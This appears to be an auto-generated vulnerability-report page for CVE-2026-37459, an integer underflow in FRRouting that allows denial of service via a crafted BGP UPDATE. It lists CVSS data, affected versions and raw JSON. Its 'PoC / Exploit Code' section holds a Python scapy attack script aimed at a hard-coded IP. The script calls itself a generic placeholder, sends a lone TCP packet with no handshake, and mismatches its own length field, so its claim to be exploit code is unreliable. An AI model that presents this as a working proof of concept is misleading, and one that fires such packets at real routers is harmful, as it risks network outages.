Security Vulnerability Report
中文
CVE-2026-37459 CVSS 7.5 HIGH

CVE-2026-37459

Published: 2026-05-04 18:16:29
Last Modified: 2026-05-05 19:47:31

Description

An integer underflow in FRRouting (FRR) stable/10.0 to stable/10.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

FRRouting stable/10.0
FRRouting stable/10.1
FRRouting stable/10.2
FRRouting stable/10.3
FRRouting stable/10.4
FRRouting stable/10.5
FRRouting stable/10.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys from scapy.all import * def send_exploit(target_ip): # Crafted BGP UPDATE message to trigger integer underflow # This is a generic template; specific bytes depend on the patch diff marker = b'\xff' * 16 len_header = b'\x00\x13' # Length placeholder type_msg = b'\x02' # UPDATE # Malicious payload simulation bgp_payload = marker + len_header + type_msg + b'A'*20 pkt = IP(dst=target_ip)/TCP(dport=179, flags='PA', sport=49152)/Raw(load=bgp_payload) send(pkt, verbose=0) print(f"[*] Exploit packet sent to {target_ip}") if __name__ == "__main__": send_exploit("192.168.1.1")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37459", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:28.807", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An integer underflow in FRRouting (FRR) stable/10.0 to stable/10.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/FRRouting/frr/commit/693a2e02687cdc9d16501275e05136edea9650d9", "source": "[email protected]"}]}}